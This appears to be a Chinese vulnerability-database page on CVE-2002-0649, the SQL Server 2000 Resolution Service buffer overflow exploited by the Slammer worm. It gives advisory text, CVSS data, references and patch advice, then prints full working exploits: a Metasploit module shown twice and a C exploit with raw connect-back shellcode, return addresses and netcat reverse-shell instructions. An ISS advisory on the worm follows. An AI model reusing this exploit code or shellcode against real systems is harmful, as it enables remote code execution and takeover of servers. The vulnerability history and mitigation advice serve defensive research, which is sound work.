CVE-2002-0649
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:21:02
NMCOEPS    

[原文]Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm.


[CNNVD]Microsoft SQL Server 2000 Resolution服务远程堆缓冲区溢出漏洞(MS02-039)(CNNVD-200208-006)

        Microsoft SQL Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统。
        Microsoft SQL Server 2000的Resolution服务对用户提交的UDP包缺少正确的处理,远程攻击者可以利用这个漏洞进行基于堆的缓冲区溢出攻击。
        Microsoft SQL Server 2000支持在单个物理主机上伺服多个SQL服务器的实例,每个实例操作需要通过单独的服务,不过多个实例不能全部使用标准SQL服务会话会话端口(TCP 1433),所以SQL Server Resolution服务操作监听在UDP 1434端口,提供一种使客户端查询适当的网络末端用于特殊的SQL服务实例的途径。
        当SQL Server Resolution服务在UDP 1434端口接收到第一个字节设置为0x08,接着为超长字符串,再追加":"符号和数字的UDP包时,会出现基于堆的缓冲区溢出,攻击者可以通过破坏堆结构而以自己提供的地址覆盖内存中的任意位置,可导致控制进程的执行,精心提交字符串数据可导致以SQL Server进程的权限在系统中执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:2000Microsoft SQL Server 2000
cpe:/a:microsoft:data_engine:2000Microsoft data_engine 2000
cpe:/a:microsoft:sql_server:2000:sp2Microsoft SQLServer 2000 Service Pack 2
cpe:/a:microsoft:sql_server:2000:sp1Microsoft SQLServer 2000 Service Pack 1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1077MS SQL Server 2000 Resolution Service Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0649
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-006
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102760196931518&w=2
(UNKNOWN)  BUGTRAQ  20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
http://marc.info/?l=ntbugtraq&m=102760479902411&w=2
(UNKNOWN)  NTBUGTRAQ  20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
http://www.cert.org/advisories/CA-2002-22.html
(UNKNOWN)  CERT  CA-2002-22
http://www.cert.org/advisories/CA-2003-04.html
(UNKNOWN)  CERT  CA-2003-04
http://www.kb.cert.org/vuls/id/399260
(UNKNOWN)  CERT-VN  VU#399260
http://www.kb.cert.org/vuls/id/484891
(UNKNOWN)  CERT-VN  VU#484891
http://www.microsoft.com/technet/security/bulletin/ms02-039.asp
(VENDOR_ADVISORY)  MS  MS02-039
http://www.securityfocus.com/archive/1/archive/1/308306/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308321/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 Fw: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308324/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 Re: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308388/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 SQL Sapphire Worm Analysis
http://www.securityfocus.com/archive/1/archive/1/308393/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308396/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030126 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308418/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030125 Sapphire SQL Worm Analysis Complete
http://www.securityfocus.com/archive/1/archive/1/308419/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030126 Tool: Sapphire SQL Worm Scanner
http://www.securityfocus.com/archive/1/archive/1/308760/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030128 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308806/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030128 Re: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309096/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030129 Re: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309324/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030130 RE: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309776/30/26090/threaded
(UNKNOWN)  BUGTRAQ  20030201 The Spread of the Sapphire/Slammer SQL Worm
http://www.securityfocus.com/bid/5310
(UNKNOWN)  BID  5310

- 漏洞信息

Microsoft SQL Server 2000 Resolution服务远程堆缓冲区溢出漏洞(MS02-039)
高危 边界条件错误
2002-08-12 00:00:00 2012-11-30 00:00:00
远程  
        Microsoft SQL Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统。
        Microsoft SQL Server 2000的Resolution服务对用户提交的UDP包缺少正确的处理,远程攻击者可以利用这个漏洞进行基于堆的缓冲区溢出攻击。
        Microsoft SQL Server 2000支持在单个物理主机上伺服多个SQL服务器的实例,每个实例操作需要通过单独的服务,不过多个实例不能全部使用标准SQL服务会话会话端口(TCP 1433),所以SQL Server Resolution服务操作监听在UDP 1434端口,提供一种使客户端查询适当的网络末端用于特殊的SQL服务实例的途径。
        当SQL Server Resolution服务在UDP 1434端口接收到第一个字节设置为0x08,接着为超长字符串,再追加":"符号和数字的UDP包时,会出现基于堆的缓冲区溢出,攻击者可以通过破坏堆结构而以自己提供的地址覆盖内存中的任意位置,可导致控制进程的执行,精心提交字符串数据可导致以SQL Server进程的权限在系统中执行任意指令。

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在边界防火墙、网关设备或者SQL Server主机上限制对UDP/1434端口的访问。由于UDP报文的源地址很容易伪造,所以不能简单地限制只允许可信IP访问。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS02-039)以及相应补丁:
        MS02-039:Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS02-039.asp

        补丁下载:
         * Microsoft SQL Server 2000:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

- 漏洞信息 (16393)

Microsoft SQL Server Resolution Overflow (EDBID:16393)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms02_039_slammer.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Resolution Overflow',
			'Description'    => %q{
					This is an exploit for the SQL Server 2000 resolution
				service buffer overflow. This overflow is triggered by
				sending a udp packet to port 1434 which starts with 0x04 and
				is followed by long string terminating with a colon and a
				number. This module should work against any vulnerable SQL
				Server 2000 or MSDE install (pre-SP3).

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2002-0649'],
					[ 'OSVDB', '4578'],
					[ 'BID', '5310'],
					[ 'MSB', 'MS02-039'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'MSSQL 2000 / MSDE <= SP2',
						{
							'Platform' => 'win',
							'Ret'      => 0x42b48774,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Jul 24 2002',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(1434)
			], self.class)
	end


	def check
		info = mssql_ping
		if (info['ServerName'])
			print_status("SQL Server Information:")
			info.each_pair { |k,v|
				print_status("   #{k + (" " * (15-k.length))} = #{v}")
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		connect_udp
		print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
		print_status("Execute 'net start sqlserveragent' once access is obtained");

		# \x68:888 => push dword 0x3838383a
		buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

		# Return to the stack pointer
		buf[ 97, 4] = [target.ret].pack('V')

		# Which lands right here
		buf[101, 6] = make_nops(6)

		# Jumps 8 bytes ahead
		buf[107, 2] = "\xeb\x08"

		# Write to thread storage space to avoid a crash
		buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

		# And finally into the payload
		buf[117,payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		disconnect_udp
		handler
	end

end
		

- 漏洞信息 (21652)

Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability (EDBID:21652)
windows remote
2002-07-25 Verified
0 David Litchfield
N/A [点击下载]
source: http://www.securityfocus.com/bid/5310/info

A vulnerability in Microsoft SQL Server 2000 could allow remote attackers to access target hosts. 

A problem in the SQL Server Resolution Service allows a remote attacker to execute arbitrary code on a vulnerable host. The attacker could exploit a heap-based buffer overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434. 

***UPDATE:

A worm that may exploit this vulnerability has been detected in the wild. 

Administrators are advised to:

- Block all external access to database servers until more information is available.
- Deny access to TCP and UDP ports 1434 completely
- Implement filter rules for other ports to decrease the chances of compromise through yet unknown avenues, even if the patch for this particular vulnerability has been installed. 

Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3.

/*
MSSQL2000 Remote UDP Exploit!

Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com

fix a bug.

Modified by lion, lion@cnhonker.net
Welcome to HUC Website http://www.cnhonker.com

*/


#include <stdio.h>
#include <winsock2.h>

#pragma comment (lib,"Ws2_32") 

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;
struct sockaddr_in s_sa;

struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="\x04";
char ping[8]="\x02";

char exploit_code[]=
	"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
	"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
	"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
	"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
	"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
	"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
	"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
	"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
	"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
	"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
	"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
	"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
	"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
	"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
	"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
	"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
	"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
	"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
	"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"	
	"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
	"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
	"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
	"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
	"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
	"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
	"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
	"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
	"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
	"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
	"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
	"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
	"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
	"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
	"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
	"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
	"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
	"\x58";


int main(int argc, char *argv[])
{
	unsigned int ErrorLevel=0,len=0,c =0;
	int count = 0;
	char sc[300]="";
	char ipaddress[40]="";
	unsigned short port = 0;
	unsigned int ip = 0;
	char *ipt="";
	char buffer[400]="";
	unsigned short prt=0;
	char *prtt="";


	if(argc != 2 && argc != 5)
	{
		printf("===============================================================\r\n");
		printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
		printf("Modified from \"Advanced Windows Shellcode\"\r\n");
		printf("Code by David Litchfield, david@ngssoftware.com\r\n");
		printf("Modified by lion, fix a bug.\r\n");
		printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
		printf("Usage:\r\n");
		printf("    %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
		printf("Exemple:\r\n");
		printf("Target is MSSQL SP 0:\r\n");
		printf("    C:\\>nc -l -p 53\r\n");
		printf("    C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
		printf("Target is MSSQL SP 1 or 2:\r\n");
		printf("    c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
		return 0;
	}

	strncpy(host, argv[1], 100);

	if(argc == 5)
	{
		strncpy(ipaddress, argv[2], 36);

		port = atoi(argv[3]);

		// SQL Server 2000 Service pack level
		// The import entry for GetProcAddress in sqlsort.dll
		// is at  0x42ae1010 but on SP 1 and 2 is at  0x42ae101C
		// Need to set the last byte accordingly

		if(argv[4][0] == 0x30)
		{
			printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
			exploit_code[9]=0x10;
		}
		else
		{
			printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
		}

	}

	ErrorLevel = StartWinsock();
	if(ErrorLevel==0)
	{
		printf("Starting Winsock Error.\r\n");
		return 0;
	}

	if(argc == 2)
	{
		strcpy(request,ping);

		GainControlOfSQL();
		return 0;
	}


	strcpy(buffer,exploit_code);

	// set this IP address to connect back to
	// this should be your address
	ip = inet_addr(ipaddress);
	ipt = (char*)&ip;
	buffer[142]=ipt[0];
	buffer[143]=ipt[1];
	buffer[144]=ipt[2];
	buffer[145]=ipt[3];

	// set the TCP port to connect on
	// netcat should be listening on this port
	// e.g. nc -l -p 80

	prt = htons(port);
	prt = prt ^ 0xFFFF;
	prtt = (char *) &prt;
	buffer[160]=prtt[0];
	buffer[161]=prtt[1];

	strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

	// Overwrite the saved return address on the stack
	// This address contains a jmp esp instruction
	// and is in sqlsort.dll.

	strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

	// Need to do a near jump
	strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

	// Need to set an address which is writable or
	// sql server will crash before we can exploit
	// the overrun. Rather than choosing an address
	// on the stack which could be anywhere we'll
	// use an address in the .data segment of sqlsort.dll
	// as we're already using sqlsort for the saved
	// return address

	// SQL 2000 no service packs needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// SQL 2000 Service Pack 2 needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// just a few nops
	strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");


	// tack on exploit code to the end of our request and fire it off
	strcat(request,buffer);

	GainControlOfSQL();

	return 0;
}


int StartWinsock()
{
	int err=0;
	WORD wVersionRequested;
	WSADATA wsaData;

	wVersionRequested = MAKEWORD(2,1);
	err = WSAStartup( wVersionRequested, &wsaData );
	if (err != 0)
	{
		printf("error WSAStartup 1.\r\n");
		return 0;
	}
	if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
	{
		printf("error WSAStartup 2.\r\n");
		WSACleanup( );
		return 0;
	}

	if (isalpha(host[0]))
	{
		he = gethostbyname(host);

		if (he == NULL)
		{
			printf("Can't get the ip of %s!\r\n", host);
			WSACleanup( );
			exit(-1);
		}

		s_sa.sin_addr.s_addr=INADDR_ANY;
		s_sa.sin_family=AF_INET;
		memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
	}
	else
	{
		s_sa.sin_family=AF_INET;
		s_sa.sin_addr.s_addr = inet_addr(host);
	}

	return 1;
}



int GainControlOfSQL(void)
{
	char resp[600]="";
	int snd=0,rcv=0,count=0, var=0;
	unsigned int ttlbytes=0;
	unsigned int to=2000;
	struct sockaddr_in        cli_addr;
	SOCKET            cli_sock;


	cli_sock=socket(AF_INET,SOCK_DGRAM,0);
	if (cli_sock==INVALID_SOCKET)
	{
		return printf("sock erron\r\n");
	}

	cli_addr.sin_family=AF_INET;
	cli_addr.sin_addr.s_addr=INADDR_ANY;
	cli_addr.sin_port=htons((unsigned short)53);

	setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
	if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
	{
		return printf("bind error");
	}

	s_sa.sin_port=htons((unsigned short)SQLUDPPort);

	if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
	{
		return printf("Connect error");
	}
	else
	{
		snd=send(cli_sock, request , strlen (request) , 0);
		printf("Packet sent!\r\n");
		printf("If you don't have a shell it didn't work.\r\n");
		rcv = recv(cli_sock,resp,596,0);
		if(rcv > 1)
		{
			while(count < rcv)
			{
				if(resp[count]==0x00)
				resp[count]=0x20;
				count++;
			}
			printf("%s",resp);
		}
	}
	closesocket(cli_sock);

	return 0;
}		

- 漏洞信息 (F82929)

Microsoft SQL Server Resolution Overflow (PacketStormID:F82929)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,overflow,udp
CVE-2002-0649
[点击下载]

This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This Metasploit module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::MSSQL
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft SQL Server Resolution Overflow',
			'Description'    => %q{
				This is an exploit for the SQL Server 2000 resolution
				service buffer overflow. This overflow is triggered by
				sending a udp packet to port 1434 which starts with 0x04 and
				is followed by long string terminating with a colon and a
				number. This module should work against any vulnerable SQL
				Server 2000 or MSDE install (pre-SP3).
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-0649'],
					[ 'OSVDB', '4578'],
					[ 'BID', '5310'],
					[ 'MSB', 'MS02-039'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'MSSQL 2000 / MSDE <= SP2',
						{
							'Platform' => 'win',
							'Ret'      => 0x42b48774,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Jul 24 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(1434)
				], self.class)
	end
	
	
	def check
		info = mssql_ping
		if (info['ServerName'])
			print_status("SQL Server Information:")
			info.each_pair { |k,v|
				print_status("   #{k + (" " * (15-k.length))} = #{v}")
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		
		connect_udp
		print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
		print_status("Execute 'net start sqlserveragent' once access is obtained");

		# \x68:888 => push dword 0x3838383a
		buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
		
		# Return to the stack pointer
		buf[ 97, 4] = [target.ret].pack('V')
		
		# Which lands right here
		buf[101, 6] = make_nops(6)
		
		# Jumps 8 bytes ahead
		buf[107, 2] = "\xeb\x08"
		
		# Write to thread storage space to avoid a crash
		buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
		
		# And finally into the payload
		buf[117,payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		disconnect_udp
		handler
	end

end
    

- 漏洞信息 (F30751)

iss.slammer.worm.txt (PacketStormID:F30751)
2003-01-25 00:00:00
 
worm
CVE-2002-0649
[点击下载]

ISS Security Advisory - The "Microsoft SQL Slammer Worm" is spreading via unpatched SQL servers. Once a vulnerable computer is compromised, the worm will infect that target, randomly select a new target, and resend the exploit and propagation code to that host sending a large amount of network traffic in the process which crashes some network equipment.

Alerts

Internet Security systems Security Alert
January 25, 2003

Microsoft SQL Slammer Worm Propagation

Synopsis:

ISS X-Force has learned of a worm that is spreading via Microsoft SQL
servers. The worm is responsible for large amounts of Internet traffic as
well as millions of UDP/IP probes at the time of this alert's publication.
This worm attempts to exploit MS/SQL servers vulnerable to the SQL Server
Resolution service buffer overflow (CVE CAN-2002-0649). Once a vulnerable
computer is compromised, the worm will infect that target, randomly select a
new target, and resend the exploit and propagation code to that host.

Impact:

Although the Slammer worm is not destructive to the infected host, it does
generate a damaging level of network traffic when it scans for additional
targets. A large amount of network traffic is created by the worm, which
scans random IP addresses for vulnerable servers. Billions of attacks have
been detected in the last 12 hours from various industry sources, including
ISS MSS (Managed Security Services). ISS has received reports that several
major national ISPs were either experiencing severe latency or were completely
unreachable during the same time frame.

Affect Versions:

Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Note: Unpatched or base installations older than SP3 are vulnerable.

Description:

The Slammer worm propagates via Microsoft SQL installations without patches
from Microsoft Security Bulletin MS02-039 or higher. The main function of the
Slammer worm is to continue propagation. No DDOS or backdoor functionality is
incorporated into the worm.  Infection can be removed with a reboot, however
without protection in place, it is likely that vulnerable servers will be
quickly re-infected.

The Slammer worm loads Kernel32.dll and WS2_32.dll and then calls GetTickCount
which is used as a seed for a random IP address routine. This routine then
continuously sends 376 bytes of exploit and propagation code across port
1434/UDP until the SQL Server process is shut down. The Slammer worm does not
prefer to scan local subnet addresses like the Nimda worm. This will limit
the speed of propagation across local networks, but this scanning method
generates large amounts of traffic that can overwhelm networks.

The Slammer worm simply seeks to replicate itself and does not try to further
compromise servers or retain access to compromised hosts. The Slammer worm does
not infect or modify files, it only exists in memory.

Recommendations:

ISS X-Force recommends that system administrators immediately take steps to
protect their networks. To remove the infection, apply the necessary patches
listed below and restart the server. This action will remove the worm from
memory.

The following ISS updates address the issues described in this alert. These
updates are available from the ISS Download center (http://www.iss.net/download)

RealSecure Network Sensor XPU 20.4 and XPU 5.3 (available 9/17/02) or greater.

Internet Scanner XPU 6.15 (available 7/25/02).

Additionally ISS X-Force recommends blocking UDP port 1433 and 1434 traffic to
protect SQL Server databases with a firewall or packet filter.

Microsoft SQL Server customers should refer to the following address for
information and securing Microsoft SQL Server against this buffer overflow:
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp.

Additional Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CAN-2002-0649 to this issue. This is a candidate for inclusion in the CVE
list http://cve.mitre.org), which standardizes names for security problems.

NGSSoftware Insight Security Research Advisory #NISR25072002, "Unauthenticated
Remote Compromise in MS SQL Server 2000" at:
http://www.ngssoftware.com/advisories/mssql-udp.txt

Microsoft Security Bulletin MS02-039, "Buffer Overruns in SQL Server 2000
Resolution Service Could Enable Code Execution (Q323875)" at
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp

CERT Advisory CA-2002-22, "Multiple Vulnerabilities in Microsoft SQL Server"
at: http://www.cert.org/advisories/CA-2002-22.html

CERT Vulnerability Note VU#484891, "Microsoft SQL Server 2000 contains stack
buffer overflow in SQL Server Resolution Service" at:
http://www.kb.cert.org/vuls/id/484891

NGSSoftware Insight Security Research Advisory #NISR03092002B, "Windows .NET
Server (RC1) and MSDE" at:
http://www.nextgenss.com/advisories/dotnet-msde.txt

Standards associated with this entry:
BID-5311: Microsoft SQL Server 2000 Resolution Service Stack Overflow
Vulnerability

______

About Internet Security Systems (ISS)
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
pioneer and world leader in software and services that protect critical
online resources from an ever-changing spectrum of threats and misuse.
Internet Security Systems is headquartered in Atlanta, GA, with
additional operations throughout the Americas, Asia, Australia, Europe
and the Middle East.

Copyright (c) 2003 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email  for
permission.

Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.
X-Force PGP Key available on MIT's PGP key server and PGP.com's key server,
as well as at <http://www.iss.net/security_center/sensitive.php>
Please send suggestions, updates, and comments to: X-Force
 of Internet Security Systems, Inc.

    

- 漏洞信息

4577
Microsoft SQL Resolution Service 0x08 Byte Long String Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Microsoft SQL Server and Desktop Engine contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to the SQL Server Resolution Service not properly sanitizing remote user input. If an attacker sends a specially crafted request (byte set to 0x08 followed by long string and colon), they may be able to overflow a buffer to execute arbitrary code on the system.

- 时间线

2002-07-24 Unknow
2002-07-24 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft SQL Server 2000 Resolution Service Stack Overflow Vulnerability
Boundary Condition Error 5311
Yes No
2002-07-25 12:00:00 2009-07-11 02:56:00
Vulnerability discovery credited to David Litchfield.

- 受影响的程序版本

Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
